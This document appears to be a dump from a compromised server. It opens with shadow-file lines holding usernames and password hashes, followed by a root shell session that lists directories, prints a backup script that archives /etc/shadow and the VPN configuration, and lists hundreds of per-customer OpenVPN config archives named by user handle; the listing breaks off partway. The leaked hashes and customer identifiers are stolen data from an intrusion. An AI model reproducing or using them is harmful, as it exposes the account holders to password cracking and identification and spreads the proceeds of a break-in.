BcLoH5F0R3:itS5U3vZ.ZSJE:14977:0:99999:7::15007:
9T9jRHvZ7q:it/k5IGATH0sU:14977:0:99999:7::15007:
ienW7EvZzk:it/3va3uNrm/g:14977:0:99999:7::15007:
kdo3z10kOe:it0m6oAlzDdt2:14978:0:99999:7::15008:
WX4JFyd3V4:itoQdv/BhznWg:14978:0:99999:7::15008:
PAhJp3OPbl:itctUnxxabPF.:14980:0:99999:7::15010:
cfmu8MNhEM:itiDjVMKDet5s:14981:0:99999:7::15011:
iyW122H0oe:itERsdw.iVxl2:14981:0:99999:7::15011:
3YePbBy2tp:it0lHPhi5gXbU:14981:0:99999:7::15011:
# cd / && ls -la
total 176
drwxr-xr-x 20 root root 4096 Jan 6 13:13 .
drwxr-xr-x 20 root root 4096 Jan 6 13:13 ..
-rw------- 1 root root 1024 May 8 2010 .rnd
lrwxrwxrwx 1 root root 39 Nov 25 20:52 aquota.group -> /proc/vz/vzaquota/0000003f/aquota.group
lrwxrwxrwx 1 root root 38 Nov 25 20:52 aquota.user -> /proc/vz/vzaquota/0000003f/aquota.user
-rwxr-xr-x 1 root root 172 Aug 21 21:34 backup.sh
drwxr-xr-x 2 root root 4096 Nov 15 02:26 bin
drwxr-xr-x 2 root root 4096 Feb 2 2010 boot
drwxr-xr-x 7 root root 4096 Jan 6 13:13 dev
-rw-r--r-- 1 root root 4416 Sep 13 14:07 e107_files
drwxr-xr-x 70 root root 4096 Jan 7 19:07 etc
drwxr-xr-x 3 root root 4096 May 9 2010 home
-rw------- 1 root root 0 Nov 2 10:30 ipp.txt
drwxr-xr-x 10 root root 4096 May 11 2010 lib
lrwxrwxrwx 1 root root 4 Nov 25 20:52 lib64 -> /lib
drwxr-xr-x 2 root root 4096 Feb 2 2010 media
drwxr-xr-x 2 root root 4096 Feb 2 2010 mnt
drwxr-xr-x 2 root root 4096 Feb 2 2010 opt
dr-xr-xr-x 171 root root 0 Jan 6 13:13 proc
drwxr-xr-x 5 root root 4096 Jan 4 20:32 root
drwxr-xr-x 2 root root 4096 Feb 2 2010 sbin
drwxr-xr-x 2 root root 4096 Feb 2 2010 selinux
drwxr-xr-x 2 root root 4096 Feb 2 2010 srv
drwxr-xr-x 3 root root 0 Jan 6 13:13 sys
drwxrwxrwt 4 root root 4096 Jan 7 18:12 tmp
drwxr-xr-x 11 root root 4096 Feb 2 2010 usr
drwxr-xr-x 14 root root 4096 Feb 2 2010 var
-rwxr-xr-x 1 root root 83749 Sep 8 21:27 xgoogler
# cat backup.sh
#!/bin/bash
name=`date | sed -e "s/ /_/g"`
name=`echo "/${name}__vpn_backup.tgz"`
tar cfvz "$name" /var/www/ /root/ /etc/openvpn/ /etc/sockd.conf /etc/passwd /etc/shadow
# cd /root && ls -la
total 92
drwxr-xr-x 5 root root 4096 Jan 4 20:32 .
drwxr-xr-x 20 root root 4096 Jan 6 13:13 ..
-rw------- 1 root root 6593 Jan 6 12:59 .bash_history
-rw-r--r-- 1 root root 409 May 9 2010 .bashrc
-rw------- 1 root root 124 Jan 3 13:02 .lesshst
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rw------- 1 root root 1024 Jan 7 05:00 .rnd
drwx------ 2 root root 4096 Jun 20 2010 .ssh
-rw------- 1 root root 6863 Jan 4 20:32 .viminfo
-rw------- 1 root root 2288 Nov 7 00:39 .viminfo.tmp
-rw------- 1 root root 0 Nov 7 00:39 .viminfz.tmp
-rwxr-xr-x 1 root root 698 May 9 2010 createSSHsocks.sh
-rw-r--r-- 1 root root 15716 Sep 13 14:12 e107_plugins
-rwxr-xr-x 1 root root 27 Oct 27 19:50 killsockd.sh
-rw-r--r-- 1 root root 5052 Aug 28 16:06 noVPNaccess
-rw-r--r-- 1 root root 53 Aug 5 00:18 sshCreateLog
drwx------ 2 root root 4096 Nov 7 00:39 v90992
drwx------ 2 root root 4096 Nov 7 00:39 v90992v90993
# cat killsockd.sh
#!/bin/bash
killall sockd
# cd /var/www && ls -la
total 2388
drwxr-xr-x 3 root root 36864 Jan 4 20:32 .
drwxr-xr-x 14 root root 4096 Feb 2 2010 ..
-rw------- 1 root root 1024 Jan 4 20:17 .rnd
-rw-r--r-- 1 root root 3588 Aug 10 22:04 0x00321279_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Jun 12 2010 0x0032291_OPENVPN.tgz
-rw-r--r-- 1 root root 3599 Oct 7 22:28 12dima1226315_OPENVPN.tgz
-rw-r--r-- 1 root root 3592 Nov 4 15:41 13scarface3731276_OPENVPN.tgz
-rw-r--r-- 1 root root 3577 Dec 8 12:16 21Kms24551_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Sep 2 19:15 2fast17248_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Jul 26 23:46 3lanka19070_OPENVPN.tgz
-rw-r--r-- 1 root root 3574 Nov 19 23:26 Abs0lut11214_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Aug 10 18:00 Accountcc19547_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Nov 26 11:45 Alanka11177_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Dec 28 13:11 Alanka30566_OPENVPN.tgz
-rw-r--r-- 1 root root 3428 Oct 22 07:58 AndreWeiher00723178_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Aug 3 20:35 Anducar31060_OPENVPN.tgz
-rw-r--r-- 1 root root 3566 Sep 5 08:18 Anducar7753_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Aug 29 23:55 Anony15422_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Jul 14 19:31 Anonym0us9696_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Dec 15 14:19 Axonym26091_OPENVPN.tgz
-rw-r--r-- 1 root root 3606 Jul 4 2010 B0rnBaby4754_OPENVPN.tgz
-rw-r--r-- 1 root root 3566 Oct 31 18:25 B4c4rd124091_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Aug 11 04:20 BEKANNTMACHUNGEN15913_OPENVPN.tgz
-rw-r--r-- 1 root root 3432 Jun 4 2010 Baduila3649_OPENVPN.tgz
-rw-r--r-- 1 root root 3399 Jul 26 18:01 Bero1346519125_OPENVPN.tgz
-rw-r--r-- 1 root root 3570 Jul 27 14:12 Bijusov1292_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Sep 28 20:34 BlaBla14724_OPENVPN.tgz
-rw-r--r-- 1 root root 3574 Sep 13 02:55 Butch1229_OPENVPN.tgz
-rw-r--r-- 1 root root 3617 Jul 1 2010 Butch21700_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Aug 11 21:57 Butch26236_OPENVPN.tgz
-rw-r--r-- 1 root root 3434 Nov 24 17:43 Carcharias198028154_OPENVPN.tgz
-rw-r--r-- 1 root root 3424 Oct 13 15:29 Carcharias19804168_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Jul 17 18:07 Chaos13009_OPENVPN.tgz
-rw-r--r-- 1 root root 3419 Jun 25 2010 CherryPicker28808_OPENVPN.tgz
-rw-r--r-- 1 root root 3620 Jun 17 2010 Chillywilly14043_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Jul 28 20:24 Chillywilly19583_OPENVPN.tgz
-rw-r--r-- 1 root root 3431 Jun 3 2010 Chiruge7152_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Nov 23 19:44 Cifer2213003_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Aug 10 22:06 Cifer2223193_OPENVPN.tgz
-rw-r--r-- 1 root root 3563 Sep 13 14:35 Cifer228621_OPENVPN.tgz
-rw-r--r-- 1 root root 3598 Jun 15 2010 CodeBeat13144_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Jul 17 01:56 CodeBeat24591_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Oct 17 21:55 CodeBeat31195_OPENVPN.tgz
-rw-r--r-- 1 root root 3624 Jun 26 2010 Crackstar133730456_OPENVPN.tgz
-rw-r--r-- 1 root root 3632 Jun 1 2010 Deadcollector6982_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Jul 20 22:40 Delphinko12230_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Oct 19 01:27 Delphinko19165_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Nov 29 16:56 Delphinko9555_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Jul 20 02:45 Device27308_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Sep 22 02:10 Device31313_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Nov 18 01:50 Device999_OPENVPN.tgz
-rw-r--r-- 1 root root 3597 Oct 13 04:40 DingDong18559_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Dec 27 07:41 DingDong25025_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Nov 23 02:05 DingDong32694_OPENVPN.tgz
-rw-r--r-- 1 root root 3425 May 31 2010 Dominik2990_OPENVPN.tgz
-rw-r--r-- 1 root root 3580 Nov 3 03:49 DrHouse30072_OPENVPN.tgz
-rw-r--r-- 1 root root 3613 Jan 3 07:10 Dukeraider16313_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Oct 21 18:07 Dukeraider16393_OPENVPN.tgz
-rw-r--r-- 1 root root 3629 Jul 3 2010 Elite13372193_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Nov 12 20:49 Emrano27523_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Dec 8 19:36 EsseX10367_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Aug 2 21:32 FAM0US10495_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Oct 26 19:26 Fahne18697_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Oct 10 01:51 FatJoe11716_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Nov 27 12:23 FatJoe31469_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Aug 21 20:16 FavourStyle4249_OPENVPN.tgz
-rw-r--r-- 1 root root 3422 Aug 29 00:05 FaxXer14831_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Oct 21 17:55 FaxXer15844_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Dec 13 17:17 FaxXer26908_OPENVPN.tgz
-rw-r--r-- 1 root root 3435 Jul 6 2010 FinalX213616_OPENVPN.tgz
-rw-r--r-- 1 root root 3401 Nov 27 11:11 FireFreak26704_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Oct 15 05:21 Flex121428_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Nov 26 19:01 Flex1219530_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Oct 18 15:08 Floep19230_OPENVPN.tgz
-rw-r--r-- 1 root root 3587 Aug 22 03:57 Floep22106_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Nov 11 01:28 Freakstyler14325_OPENVPN.tgz
-rw-r--r-- 1 root root 3629 Jun 19 2010 Freakzzor30552_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Nov 14 20:32 Fruchtii4940_OPENVPN.tgz
-rw-r--r-- 1 root root 3623 Jun 19 2010 G0ETHE22157_OPENVPN.tgz
-rw-r--r-- 1 root root 3571 Dec 19 15:29 G4g4m3l23565_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Aug 30 11:36 G4g4m3l3086_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Jul 2 2010 GinTonic30066_OPENVPN.tgz
-rw-r--r-- 1 root root 3598 Dec 17 17:05 Ginal40622069_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Dec 23 15:13 HGroup29522_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Aug 22 00:17 HGroup3416_OPENVPN.tgz
-rw-r--r-- 1 root root 3391 Jul 13 10:15 Haloneros10917_OPENVPN.tgz
-rw-r--r-- 1 root root 3396 Aug 19 16:58 Haloneros4547_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Dec 6 12:38 Haloneros7849_OPENVPN.tgz
-rw-r--r-- 1 root root 3629 Jun 28 2010 Hardstyler23602_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Jul 23 19:07 Headliner16576_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Oct 11 07:05 Hellraiser15486_OPENVPN.tgz
-rw-r--r-- 1 root root 3418 Dec 31 00:20 HonigMelone2260_OPENVPN.tgz
-rw-r--r-- 1 root root 3402 Oct 31 03:05 HonigMelone8351_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Nov 27 01:17 Iceman3299_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Dec 19 20:35 Jaksa22983_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Jul 11 20:01 Jaksa2527_OPENVPN.tgz
-rw-r--r-- 1 root root 3560 Dec 11 20:05 Jayo12320635_OPENVPN.tgz
-rw-r--r-- 1 root root 3603 Jun 30 2010 Joana24614_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Nov 26 12:12 Joana25619_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Nov 3 20:28 Jondoe28020_OPENVPN.tgz
-rw-r--r-- 1 root root 3410 Aug 30 02:45 Jondoe5523_OPENVPN.tgz
-rw-r--r-- 1 root root 3616 Jul 9 16:47 KaLLi17527_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Nov 18 01:45 Kamill9407_OPENVPN.tgz
-rw-r--r-- 1 root root 3601 Aug 17 13:08 Kasanova11582_OPENVPN.tgz
-rw-r--r-- 1 root root 3612 Jul 9 14:55 Kasanova18022_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Nov 4 16:05 Kasanova19712_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Dec 15 14:30 Kasanova22555_OPENVPN.tgz
-rw-r--r-- 1 root root 3598 Sep 17 17:54 Kasanova25732_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Oct 10 15:56 Keks1237082_OPENVPN.tgz
-rw-r--r-- 1 root root 3569 Aug 10 21:52 Keks1238205_OPENVPN.tgz
-rw-r--r-- 1 root root 3608 Dec 23 16:08 Kerber0s4146_OPENVPN.tgz
-rw-r--r-- 1 root root 3612 Aug 4 13:21 KeyserSoze18958_OPENVPN.tgz
-rw-r--r-- 1 root root 3435 Oct 14 16:03 KillerZwerg82931120_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Aug 25 20:36 Kluless30753_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Dec 29 15:05 Kolumbus15438_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Nov 15 19:14 Kucka19807504_OPENVPN.tgz
-rw-r--r-- 1 root root 3625 Jun 4 2010 LAWest26683_OPENVPN.tgz
-rw-r--r-- 1 root root 3615 Jul 6 2010 LAWest32033_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Dec 7 12:10 LiipTon17714_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Jul 29 11:58 Loader15498_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Dec 28 12:43 Loader30988_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 Jun 5 2010 Loptr20388_OPENVPN.tgz
-rw-r--r-- 1 root root 3580 Jul 20 17:23 Loptr27683_OPENVPN.tgz
-rw-r--r-- 1 root root 3586 Aug 28 00:29 Lowne11627_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Nov 11 18:34 LuckyLuke28779_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Aug 10 22:07 M000N5312_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Nov 12 20:43 Mandy13987_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Aug 4 22:43 Mandy31362_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 May 12 2010 Mandy31820_OPENVPN.tgz
-rw-r--r-- 1 root root 3607 Sep 2 01:46 Mantis7011486_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 19 00:23 MarkusSx16847_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Sep 10 16:05 Masterlord10052_OPENVPN.tgz
-rw-r--r-- 1 root root 3594 Dec 3 17:10 Maxim6745_OPENVPN.tgz
-rw-r--r-- 1 root root 3421 Dec 29 15:38 McKnad15403_OPENVPN.tgz
-rw-r--r-- 1 root root 3622 May 28 2010 McKnad23906_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Aug 29 18:10 McKnad2804_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Oct 3 00:19 McKnad9531_OPENVPN.tgz
-rw-r--r-- 1 root root 3627 Jul 11 00:59 Morgen22283_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Aug 14 23:15 Mutti17770_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Oct 5 01:40 Mutti21505_OPENVPN.tgz
-rw-r--r-- 1 root root 3610 May 12 2010 Mutti8762_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Nov 9 23:21 N3v107908_OPENVPN.tgz
-rw-r--r-- 1 root root 3599 Jan 2 11:57 N3v108540_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Jul 30 16:17 NDTBIT12101_OPENVPN.tgz
-rw-r--r-- 1 root root 3428 Oct 16 05:23 NDTBIT25949_OPENVPN.tgz
-rw-r--r-- 1 root root 3413 Sep 7 20:33 NDTBIT26205_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Jul 29 04:41 Nappo10976_OPENVPN.tgz
-rw-r--r-- 1 root root 3401 Aug 10 13:09 Nighty5510_OPENVPN.tgz
-rw-r--r-- 1 root root 3611 Jun 3 2010 Nop0x29828_OPENVPN.tgz
-rw-r--r-- 1 root root 3616 May 27 2010 Oldsql26067_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Sep 23 01:42 Pasi6512495_OPENVPN.tgz
-rw-r--r-- 1 root root 3632 Jul 10 00:12 PeteSniff26963_OPENVPN.tgz
-rw-r--r-- 1 root root 3622 May 22 2010 Ph0nix4947_OPENVPN.tgz
-rw-r--r-- 1 root root 3635 Jun 29 2010 Phantonym17925_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Oct 26 05:43 Phiriun2823_OPENVPN.tgz
-rw-r--r-- 1 root root 3409 Dec 10 17:07 Pitbull6910648_OPENVPN.tgz
-rw-r--r-- 1 root root 3615 Jun 25 2010 Pl0051690_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Nov 28 08:39 Poseidon10572_OPENVPN.tgz
-rw-r--r-- 1 root root 3600 Aug 16 21:45 PostMort3m12175_OPENVPN.tgz
-rw-r--r-- 1 root root 3422 Sep 2 19:56 Prager28005_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 Jun 21 2010 Prager2997_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 24 16:50 Predat0r20106_OPENVPN.tgz
-rw-r--r-- 1 root root 3596 Jul 13 18:11 Predat0r9093_OPENVPN.tgz
-rw-r--r-- 1 root root 3620 Jun 13 2010 Profi13618_OPENVPN.tgz
-rw-r--r-- 1 root root 3623 Aug 2 01:50 Pussyrider12591_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Sep 7 02:28 Pussyrider2553_OPENVPN.tgz
-rw-r--r-- 1 root root 3621 Jul 5 2010 Pwhoam7437_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Nov 23 23:34 QuickSilver30900_OPENVPN.tgz
-rw-r--r-- 1 root root 3436 Jun 8 2010 R0MANCE30753_OPENVPN.tgz
-rw-r--r-- 1 root root 3628 Jun 29 2010 Raiden19032_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Nov 21 20:34 Rambo020232438_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Oct 4 16:22 Rambo02026184_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Jul 18 16:28 Raser8912111_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Oct 19 23:52 Ratte15435_OPENVPN.tgz
-rw-r--r-- 1 root root 3575 Oct 20 00:50 Ratte29885_OPENVPN.tgz
-rw-r--r-- 1 root root 3573 Aug 8 14:34 Revar13568_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Sep 13 20:35 Revar186_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Aug 3 00:36 Rodney29032_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Sep 13 18:11 S3t4p3x311542_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Dec 14 12:26 Sa1nt856432005_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Sep 22 02:07 SaCuSkill19539_OPENVPN.tgz
-rw-r--r-- 1 root root 3430 Jun 3 2010 Scanner22720_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Dec 27 17:07 Senninmod9366_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Dec 11 17:13 SilverFox12282_OPENVPN.tgz
-rw-r--r-- 1 root root 3574 Aug 29 20:49 SilverS14224_OPENVPN.tgz
-rw-r--r-- 1 root root 3431 May 15 2010 SilverS18699_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Oct 2 10:17 SilverS29996_OPENVPN.tgz
-rw-r--r-- 1 root root 3590 Nov 1 15:44 SlamD7819_OPENVPN.tgz
-rw-r--r-- 1 root root 3596 Nov 21 22:25 SleepyHollow30848_OPENVPN.tgz
-rw-r--r-- 1 root root 3574 Aug 20 05:00 Slumski15259_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Dec 11 17:30 SmileNike4939_OPENVPN.tgz
-rw-r--r-- 1 root root 3628 Jun 25 2010 SonnyBlack761_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Nov 18 20:30 Sparkasse19880_OPENVPN.tgz
-rw-r--r-- 1 root root 3427 Jun 16 2010 Standex637_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Nov 7 23:40 Star1711657_OPENVPN.tgz
-rw-r--r-- 1 root root 3407 Oct 14 20:11 Stejin14830_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Nov 29 13:23 Stejin27979_OPENVPN.tgz
-rw-r--r-- 1 root root 3621 Jun 9 2010 SunDay5117_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Sep 27 09:43 Swiss8114_OPENVPN.tgz
-rw-r--r-- 1 root root 3572 Jul 17 22:38 Sylcore21775_OPENVPN.tgz
-rw-r--r-- 1 root root 3561 Jul 16 03:23 Sylcore27550_OPENVPN.tgz
-rw-r--r-- 1 root root 3627 Jul 2 2010 Syntex31511_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Nov 4 06:13 TARTAROS15648_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Jul 18 13:57 Thnallgzt1355_OPENVPN.tgz
-rw-r--r-- 1 root root 3613 Dec 13 06:07 Thunder052_OPENVPN.tgz
-rw-r--r-- 1 root root 3403 Oct 17 17:16 Tiberius121180_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Aug 20 21:22 Tiberius25495_OPENVPN.tgz
-rw-r--r-- 1 root root 3420 Aug 29 17:10 Torbon5467_OPENVPN.tgz
-rw-r--r-- 1 root root 3597 Oct 4 01:41 Trinx15364_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Nov 22 00:54 Trinx24908_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Aug 29 21:56 Trinx31242_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Jul 11 18:39 Trinx9318_OPENVPN.tgz
-rw-r--r-- 1 root root 3408 Jul 15 21:27 Tronic24834_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 18 21:32 Tronic32029_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 May 17 2010 Tweaknap31697_OPENVPN.tgz
-rw-r--r-- 1 root root 3417 Sep 16 14:41 Tzolli11813_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Sep 17 00:26 Tzolli12805_OPENVPN.tgz
-rw-r--r-- 1 root root 3634 Jul 2 2010 Tzolli31127_OPENVPN.tgz
-rw-r--r-- 1 root root 3626 Jun 1 2010 Tzolli530_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Oct 22 01:07 Ukash31388_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Oct 5 15:59 WEEDtwo23015_OPENVPN.tgz
-rw-r--r-- 1 root root 3557 Dec 14 17:42 WEEDtwo358_OPENVPN.tgz
-rw-r--r-- 1 root root 3570 Oct 18 17:52 WalterW26039_OPENVPN.tgz
-rw-r--r-- 1 root root 3567 Dec 1 14:47 WalterW5032_OPENVPN.tgz
-rw-r--r-- 1 root root 3616 Jul 10 16:28 WeArEoNe5813_OPENVPN.tgz
-rw-r--r-- 1 root root 3632 Jul 1 2010 Weichei4520239_OPENVPN.tgz
-rw-r--r-- 1 root root 3609 Nov 21 22:43 Wursteintopf1171_OPENVPN.tgz
-rw-r--r-- 1 root root 3614 Jul 9 2010 X3N0N8545_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Nov 1 20:31 Xeral1887_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Sep 13 21:52 Zerox8831175_OPENVPN.tgz
-rw-r--r-- 1 root root 3571 Nov 7 19:55 Zorator17384_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 17 18:58 Zuraaa30069_OPENVPN.tgz
-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php
-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php
-rw-r--r-- 1 root root 3574 Sep 1 00:39 adios21334_OPENVPN.tgz
-rw-r--r-- 1 root root 3610 Nov 27 13:43 adminadmin663_OPENVPN.tgz
-rw-r--r-- 1 root root 3395 Dec 24 05:38 analytics23444_OPENVPN.tgz
-rw-r--r-- 1 root root 3408 Dec 18 08:46 andreas741128201_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Sep 25 10:41 anonymius696_OPENVPN.tgz
-rw-r--r-- 1 root root 3430 Jul 6 2010 anoobis20036_OPENVPN.tgz
-rw-r--r-- 1 root root 3628 Jun 18 2010 asd12322807_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Aug 2 22:29 asd12326649_OPENVPN.tgz
-rw-r--r-- 1 root root 3414 Aug 3 18:40 asd12328521_OPENVPN.tgz
-rw-r--r-- 1 root root 3621 Jun 25 2010 asd1233886_OPENVPN.tgz
-rw-r--r-- 1 root root 3415 Jul 20 19:54 asdfg12345627545_OPENVPN.tgz
-rw-r--r-- 1 root root 3405 Nov 2 15:47 asdfghjkl27874_OPENVPN.tgz
-rw-r--r-- 1 root root 3564 Dec 10 07:39 awesome50_OPENVPN.tgz
-rw-r--r-- 1 root root 3589 Nov 9 15:31 b0uNz18610_OPENVPN.tgz
-rw-r--r-- 1 root root 3594 Dec 2 22:03 b111124378_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Oct 24 03:30 b14ckf1ag13016_OPENVPN.tgz
-rw-r--r-- 1 root root 3411 Dec 15 15:30 b14ckf1ag14907_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Oct 4 17:00 b7231244_OPENVPN.tgz
-rw-r--r-- 1 root root 3578 Nov 21 03:08 b72317220_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Oct 20 04:19 b72337515_OPENVPN.tgz
-rw-r--r-- 1 root root 3596 Nov 9 01:37 bLackftw19898791_OPENVPN.tgz
-rw-r--r-- 1 root root 3602 Oct 11 20:18 badboy10125461_OPENVPN.tgz
-rw-r--r-- 1 root root 3579 Jul 17 23:40 bambuss3686_OPENVPN.tgz
-rw-r--r-- 1 root root 3419 Sep 9 20:38 basics14055_OPENVPN.tgz
-rw-r--r-- 1 root root 3581 Dec 27 16:44 becks1088_OPENVPN.tgz
-rw-r--r-- 1 root root 3587 Nov 5 18:26 becks1540_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Nov 7 19:27 bergi181219604_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Aug 15 01:15 bigtwin25561_OPENVPN.tgz
-rw-r--r-- 1 root root 3397 Jul 13 12:56 blackcell12902_OPENVPN.tgz
-rw-r--r-- 1 root root 3641 Jun 11 2010 blackcell1900_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 14 18:25 bloodyrain6388_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Jun 3 2010 bluballa28446_OPENVPN.tgz
-rw-r--r-- 1 root root 3584 Nov 10 20:41 bobby11515_OPENVPN.tgz
-rw-r--r-- 1 root root 3576 Aug 12 14:55 bobby15402_OPENVPN.tgz
-rw-r--r-- 1 root root 3582 Sep 17 03:28 bobby1638_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Dec 11 14:06 bobby7804_OPENVPN.tgz
-rw-r--r-- 1 root root 3583 Oct 18 18:37 cafe116337_OPENVPN.tgz
-rw-r--r-- 1 root root 3604 Aug 14 21:49 cardercarder18567_OPENVPN.tgz
-rw-r--r-- 1 root root 3412 Jul 7 2010 cardercarder21402_OPENVPN.tgz
-rw-r--r-- 1 root root 3593 Dec 12 19:16 cardercarder31297_OPENVPN.tgz
-rw-r--r-- 1 root root 3588 Sep 14 07:54 cardercarder6893_OPENVPN.tgz
-rw-r--r-- 1 root root 3585 Oct 28 02:05 cardercarder8070_OPENVPN.tgz
-rw-r--r-- 1 root root 3416 Oct 15 01:29 carlos3914_OPENVPN.tgz
-rw-r--r-- 1 root root 3564 Nov 23 05:29 cayenne10018_OPENVPN.tgz
-rw-r--r-- 1 root root 3605 Jul 21 17:29 checka1220438_OPENVPN.tgz
-rw-r--r-- 1 root root 3404 Dec 28 14:48 chessy33331564_OPENVPN.tgz
-rw-r--r-- 1 root root 3406 Sep 29 16:28 chessy3333215_OPENVPN.tgz
